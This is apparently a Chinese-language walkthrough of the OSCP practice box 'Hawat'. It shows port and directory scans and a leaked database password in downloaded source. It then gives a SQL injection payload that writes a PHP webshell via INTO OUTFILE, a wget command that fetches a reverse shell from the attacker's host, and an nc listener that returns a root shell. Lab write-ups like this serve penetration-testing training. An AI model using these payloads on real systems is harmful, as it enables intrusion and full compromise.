OSCP靶场–Hawat

考点(目录扫描+zip文件下载+java代码审计+web1的sql注入写到web2的webshel)

1.nmap扫描

##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.158.147 -sV -sC  -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-11 07:18 EDT
Nmap scan report for 192.168.158.147
Host is up (0.23s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT      STATE  SERVICE      VERSION
22/tcp    open   ssh          OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey: 
|   3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
|   256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_  256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp   closed rpcbind
139/tcp   closed netbios-ssn
443/tcp   closed https
445/tcp   closed microsoft-ds
17445/tcp open   unknown
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=UTF-8
|     Content-Language: en-US
|     Date: Thu, 11 Apr 2024 11:19:48 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <title>Issue Tracker</title>
|     <link href="/css/bootstrap.min.css" rel="stylesheet" />
|     </head>
|     <body>
|     <section>
|     <div class="container mt-4">
|     <span>
|     <div>
|     href="/login" class="btn btn-primary" style="float:right">Sign In</a> 
|     href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
|     </div>
|     </span>
|     <br><br>
|     <table class="table">
|     <thead>
|     <tr>
|     <th>ID</th>
|     <th>Message</th>
|     <th>P
|   HTTPOptions: 
|     HTTP/1.1 200 
|     Allow: GET,HEAD,OPTIONS
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Length: 0
|     Date: Thu, 11 Apr 2024 11:19:48 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 400 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Thu, 11 Apr 2024 11:19:49 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400 
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400 
|_    Request</h1></body></html>
30455/tcp open   http         nginx 1.18.0
|_http-title: W3.CSS
|_http-server-header: nginx/1.18.0
50080/tcp open   http         Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
| http-methods: 
|_  Potentially risky methods: TRACE

2.user priv

2.1 目录扫描&简单java代码审计

## 3个web端口目录扫描：
##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:17445/                      
[08:25:04] 200 -    1KB - /login                                            
[08:25:05] 302 -    0B  - /logout  ->  http://192.168.158.147:17445/index   
[08:25:21] 200 -    2KB - /register                                         
                                                                             
Task Completed

##########
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:30455/
[08:24:38] 301 -  169B  - /4  ->  http://192.168.158.147:30455/4/           
[08:25:29] 200 -    3KB - /index.php                                        
[08:25:50] 200 -   67KB - /phpinfo.php                                      
                                                                             
Task Completed

##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url  http://192.168.158.147:50080/                              
[08:25:07] 301 -  239B  - /4  ->  http://192.168.158.147:50080/4/           
[08:25:49] 301 -  243B  - /cloud  ->  http://192.168.158.147:50080/cloud/   
[08:25:49] 302 -    0B  - /cloud/  ->  http://192.168.158.147:50080/cloud/index.php/login
[08:25:58] 403 -  994B  - /error/                                           
[08:26:03] 301 -  244B  - /images  ->  http://192.168.158.147:50080/images/ 
[08:26:03] 200 -    1KB - /images/
[08:26:04] 200 -    9KB - /index.html                                       
                                        
                                                                             
Task Completed  

######################
## 访问后跳转：admin:admin弱密码登陆：
 http://192.168.158.147:50080/cloud/index.php/login
###


#############
## 解压后正则过滤：password等关键字：
┌──(root㉿kali)-[~/Downloads/issuetracker]
└─# grep password -r ./*
./mvnw:            wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java:                    //change here to store encoded password in db
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java:                    .password(users.getPassword())
./src/main/java/com/issue/tracker/users/Users.java:     private String password;
./src/main/java/com/issue/tracker/users/Users.java:             return password;
./src/main/java/com/issue/tracker/users/Users.java:     public void setPassword(String password) {
./src/main/java/com/issue/tracker/users/Users.java:             this.password = password;
./src/main/java/com/issue/tracker/issues/IssueController.java:      connectionProps.put("password", "ManagementInsideOld797");
./src/main/java/com/issue/tracker/config/WebSecurityConfig.java:                auth.userDetailsService(userDetailsService).passwordEncoder(bCryptPasswordEncoder);
./src/main/resources/templates/user_form.html:                                                          <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/templates/login.html:                                                              <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/application.properties:spring.datasource.password=ManagementInsideOld797
./src/main/resources/static/js/jquery-3.4.1.js:for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
./src/main/resources/static/js/jquery-3.4.1.js:         password: null,
./src/main/resources/static/js/jquery-3.4.1.js:                                 options.password


#################
## ssh登陆失败：
user  issue_user
password  ManagementInsideOld797

########################
##

发现sql注入，发现webroot：尝试sql注入写webshell:

2.2 sql注入写入webshell:

## payload
priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; --

## url编码：
https://www.urlencoder.org/
##
## 下一步是让代码执行。使用之前从phpinfo.php文件中提取的详细信息，我们知道 PHP 服务器的 Web 根目录，我们可以在其中编写反向 shell 有效负## 载。
$_SERVER['DOCUMENT_ROOT']	/srv/http

## 让我们测试一下，我们将使用以下简单的 webshel​​l。
<?php echo exec($_GET["cmd"]);

## 最终的有效负载将如下所示。
priority=Normal' UNION SELECT (<?php echo exec($_GET["cmd"]);) INTO OUTFILE '/srv/http/cmd.php'; -- 

## 使用URL Encoder这样的工具，我们将字符串编码为 URL 兼容。
## https://www.urlencoder.org/

## 请注意，有效负载末尾有一个尾随空格。让我们使用 Burp 运行此查询。
Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+


## burp重放：url编码时候不对空格编码
POST /issue/checkByPriority?priority=Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+ HTTP/1.1
Host: 192.168.158.147:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E408CE3E9BBBEC15DCAD194F380E68A9
Upgrade-Insecure-Requests: 1

## 如果一切顺利，我们可以确认该文件已创建（我们会记住泄漏phpinfo.php文件的 Web 服务器位于端口 30455）
kali@kali:~$ curl "http://192.168.158.147:30455/cmd.php?cmd=id" 

##############
##

2.3 反弹交互式shell:

##
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

## 修改webshell的反弹iphe端口：
http://192.168.158.147:30455/cmd.php?cmd=wget%20http://192.168.45.195:443/lrshell.php%20-O%20/srv/http/lrshell.php

### kali：
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.158.147 - - [11/Apr/2024 11:05:18] "GET /lrshell.php HTTP/1.1" 200 -

## 浏览器访问：
http://192.168.158.147:30455/lrshell.php



#######
## 
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.158.147: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.158.147] 43712
Linux hawat 5.10.14-arch1-1 #1 SMP PREEMPT Sun, 07 Feb 2021 22:42:17 +0000 x86_64 GNU/Linux
 15:06:07 up  3:50,  0 users,  load average: 0.05, 0.04, 0.00
USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: cannot set terminal process group (1838): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1# whoami
whoami
root
sh-5.1# cat /root/proof.txt
cat /root/proof.txt
9643c700b5e14b23afb54d4293548a99
sh-5.1# 

3. root priv

4.总结：

##
https://medium.com/@blueclps080984/proving-grounds-hawat-easy-linux-box-walkthrough-a-journey-to-offensive-security-cc24110b246f